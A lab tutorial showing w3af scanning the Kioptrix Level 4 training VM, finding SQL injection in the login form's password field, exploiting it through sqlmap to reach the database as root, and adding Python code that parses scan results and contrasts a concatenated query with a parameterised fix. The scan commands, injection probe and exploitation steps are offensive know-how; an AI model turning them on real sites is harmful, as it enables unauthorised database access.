0x00 Overview
Using w3af on BackTrack 5 R3 to test Kioptrix Level 4 for a SQL injection vulnerability.
0x01 Introduction
w3af is a Web Application Attack and Audit Framework. The project has more than 130 plugins, including a web spider and checks for SQL injection, cross-site scripting (XSS), local file inclusion (LFI), remote file inclusion (RFI) and more.
The project's goal is to build a framework for finding and exploiting web application security vulnerabilities that is easy to use and to extend.
0x02 Installation
root@bt:~# apt-get install w3af
0x03 Startup
root@bt:~# cd /pentest/web/w3af/
root@bt:/pentest/web/w3af# ./w3af_console
0x04 Scan configuration
w3af>>> plugins
//Enter the plugins menu
w3af/plugins>>> list discovery
//List all discovery plugins
w3af/plugins>>> discovery findBackdoor phpinfo webSpider
//Enable the three plugins findBackdoor, phpinfo and webSpider
w3af/plugins>>> list audit
//List all audit (vulnerability-checking) plugins
w3af/plugins>>> audit blindSqli fileUpload osCommanding sqli xss
//Enable the five plugins blindSqli, fileUpload, osCommanding, sqli and xss
w3af/plugins>>> back
//Return to the main menu
w3af>>> target
//Enter the target configuration menu
w3af/config:target>>> set target http://192.168.244.132/
//Set the target to http://192.168.244.132/
w3af/config:target>>> back
//Return to the main menu
0x05 Vulnerability scan
w3af>>> start
---
New URL found by phpinfo plugin: http://192.168.244.132/
New URL found by phpinfo plugin: http://192.168.244.132/checklogin.php
New URL found by phpinfo plugin: http://192.168.244.132/index.php
New URL found by webSpider plugin: http://192.168.244.132/
New URL found by webSpider plugin: http://192.168.244.132/checklogin.php
New URL found by webSpider plugin: http://192.168.244.132/index.php
Found 3 URLs and 8 different points of injection.
The list of URLs is:
- http://192.168.244.132/index.php
- http://192.168.244.132/checklogin.php
- http://192.168.244.132/
The list of fuzzable requests is:
- http://192.168.244.132/ | Method: GET
- http://192.168.244.132/ | Method: GET | Parameters: (mode="phpinfo")
- http://192.168.244.132/ | Method: GET | Parameters: (view="phpinfo")
- http://192.168.244.132/checklogin.php | Method: GET
- http://192.168.244.132/checklogin.php | Method: POST | Parameters: (myusername="", mypassword="")
- http://192.168.244.132/index.php | Method: GET
- http://192.168.244.132/index.php | Method: GET | Parameters: (mode="phpinfo")
- http://192.168.244.132/index.php | Method: GET | Parameters: (view="phpinfo")
Blind SQL injection was found at: "http://192.168.244.132/checklogin.php", using HTTP method POST. The injectable parameter is: "mypassword". This vulnerability was found in the requests with ids 309 to 310.
A SQL error was found in the response supplied by the web application, the error is (only a fragment is shown): "supplied argument is not a valid MySQL". The error was found on response with id 989.
A SQL error was found in the response supplied by the web application, the error is (only a fragment is shown): "mysql_". The error was found on response with id 989.
SQL injection in a MySQL database was found at: "http://192.168.244.132/checklogin.php", using HTTP method POST. The sent post-data was: "myusername=John&Submit=Login&mypassword=d'z"0". The modified parameter was "mypassword". This vulnerability was found in the request with id 989.
Scan finished in 19 seconds.
---
//Start the scan; the output above is what w3af prints while it runs
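The scan output above is free text, which is awkward to hand to a triage ticket or a diff against the next scan. The following Python script is an added example (not part of the original post and not w3af's own code): it parses the finding lines into records carrying the URL, HTTP method, parameter and the w3af request ids you would pull from the HTTP log, and collapses them to the distinct injection points that need a fix. The sample input is constructed from the lines shown in the scan above; the message formats it matches are assumed to be those of the w3af 1.x console as printed on this page.

```python
import re
from dataclasses import dataclass

# Constructed sample: a subset of the console lines shown in the scan above.
SAMPLE_OUTPUT = """\
New URL found by webSpider plugin: http://192.168.244.132/checklogin.php
Found 3 URLs and 8 different points of injection.
Blind SQL injection was found at: "http://192.168.244.132/checklogin.php", using HTTP method POST. The injectable parameter is: "mypassword". This vulnerability was found in the requests with ids 309 to 310.
A SQL error was found in the response supplied by the web application, the error is (only a fragment is shown): "supplied argument is not a valid MySQL". The error was found on response with id 989.
A SQL error was found in the response supplied by the web application, the error is (only a fragment is shown): "mysql_". The error was found on response with id 989.
SQL injection in a MySQL database was found at: "http://192.168.244.132/checklogin.php", using HTTP method POST. The sent post-data was: "myusername=John&Submit=Login&mypassword=d'z"0". The modified parameter was "mypassword". This vulnerability was found in the request with id 989.
Scan finished in 19 seconds.
"""

# Line shapes assumed from the output printed on this page.
URL_RE = re.compile(r'^New URL found by (?P<plugin>\w+) plugin: (?P<url>\S+)$')
VULN_RE = re.compile(
    r'^(?P<kind>Blind SQL injection|SQL injection in a MySQL database) was found at: '
    r'"(?P<url>[^"]+)", using HTTP method (?P<method>[A-Z]+)\.')
PARAM_RE = re.compile(r'(?:injectable parameter is|modified parameter was)[: ]*"(?P<param>[^"]+)"')
IDS_RE = re.compile(r'ids? (?P<a>\d+)(?: to (?P<b>\d+))?\.?$')
ERROR_RE = re.compile(
    r'^A SQL error was found .*\(only a fragment is shown\): "(?P<fragment>[^"]+)"\. '
    r'The error was found on response with id (?P<id>\d+)')


@dataclass(frozen=True)
class Finding:
    kind: str            # which audit check fired
    url: str
    method: str
    param: str
    request_ids: tuple   # w3af request ids to review in the HTTP log


@dataclass(frozen=True)
class SqlError:
    fragment: str        # leaked database error text, evidence of verbose error handling
    response_id: int


def parse_w3af_output(text):
    """Return (findings, sql_errors, discovered_urls) from console output."""
    findings, errors, urls = [], [], set()
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        m = URL_RE.match(line)
        if m:
            urls.add(m.group("url"))
            continue
        m = ERROR_RE.match(line)
        if m:
            errors.append(SqlError(m.group("fragment"), int(m.group("id"))))
            continue
        m = VULN_RE.match(line)
        if m:
            p, ids = PARAM_RE.search(line), IDS_RE.search(line)
            if not (p and ids):
                continue   # unexpected line shape: skip rather than guess
            lo = int(ids.group("a"))
            hi = int(ids.group("b") or lo)
            findings.append(Finding(m.group("kind"), m.group("url"), m.group("method"),
                                    p.group("param"), tuple(range(lo, hi + 1))))
    return findings, errors, urls


def injection_points(findings):
    """Collapse overlapping findings to the distinct (url, method, param) to fix."""
    return sorted({(f.url, f.method, f.param) for f in findings})


if __name__ == "__main__":
    found, errs, seen = parse_w3af_output(SAMPLE_OUTPUT)
    for point in injection_points(found):
        print("fix:", point)
    for e in errs:
        print("verbose SQL error leaked in response", e.response_id, repr(e.fragment))
```

Both the blind and the error-based check fired on the same parameter, so the parsed output collapses to one injection point; the two SqlError records are a separate, lower-severity finding (verbose database errors reaching the client) that is worth fixing even after the query itself is parameterised.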
0x06 Exploitation configuration
w3af>>> exploit
//Enter the exploit menu
w3af/exploit>>> list exploit
//List all exploit plugins
w3af/exploit>>> exploit sqlmap
//Use sqlmap to test the SQL injection vulnerability
---
Trying to exploit using vulnerability with id: [1010, 1011]. Please wait...
Vulnerability successfully exploited. This is a list of available shells and proxies:
- [0] <sql object ( dbms: "MySQL >= 5.0.0" | ruser: "root@localhost" )>
Please use the interact command to interact with the shell objects.
---
//The test confirms the SQL injection vulnerability exists
//Note the shell object number (0 here); it is needed in the next step
0x07 Exploitation
w3af/exploit>>> interact 0
//interact + shell object number opens the shell
---
Execute "exit" to get out of the remote shell. Commands typed in this menu will be run through the sqlmap shell
w3af/exploit/sqlmap-0>>>
---
//An interactive sqlmap session
w3af/exploit/sqlmap-0>>> dbs
---
Available databases: [3]:
[*] information_schema
[*] members
[*] mysql
---
//Database information retrieved successfully
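The root cause behind the finding at checklogin.php is a login query built by string concatenation: the probe value d'z"0 that w3af sent in mypassword carries a single quote that terminates the string literal, so the database reports a syntax error and the verbose "mysql_" error text reaches the response. The Python below is an added example, not code from the original post or from Kioptrix; it uses an in-memory SQLite table as a stand-in for the MySQL "members" database and a constructed user row, and places the vulnerable concatenated query beside the parameterised fix, with a small check that mimics what the scanner's error-based test observes.

```python
import sqlite3

# The value w3af sent in the mypassword parameter (taken from the scan output above).
PROBE = 'd\'z"0'


def make_db():
    """Constructed stand-in for the 'members' database seen in the sqlmap session."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE members (username TEXT, password TEXT)")
    con.execute("INSERT INTO members VALUES ('john', 'correct horse')")  # constructed row
    return con


def login_vulnerable(con, username, password):
    # Concatenation: user input becomes part of the SQL grammar, so a quote in
    # the probe breaks the statement and the database raises a syntax error.
    sql = ("SELECT username FROM members WHERE username='%s' AND password='%s'"
           % (username, password))
    return con.execute(sql).fetchone() is not None


def login_safe(con, username, password):
    # Placeholders: the driver sends the values separately from the statement,
    # so any character in the input is treated as data, never as SQL.
    sql = "SELECT username FROM members WHERE username=? AND password=?"
    return con.execute(sql, (username, password)).fetchone() is not None


def probe_for_error(login, con, username, password):
    """Mimic the scanner's error-based check: does a quote-bearing value make the
    database fail? Returns the error text, or None when the input was handled as data."""
    try:
        login(con, username, password)
        return None
    except sqlite3.Error as e:
        return str(e)


if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", probe_for_error(login_vulnerable, db, "John", PROBE))
    print("safe:      ", probe_for_error(login_safe, db, "John", PROBE))
```

In the application itself the fix is the same as in login_safe: a prepared statement with bound parameters, plus returning a generic login failure instead of the raw database error, which is what made the injection so easy to confirm from the response body.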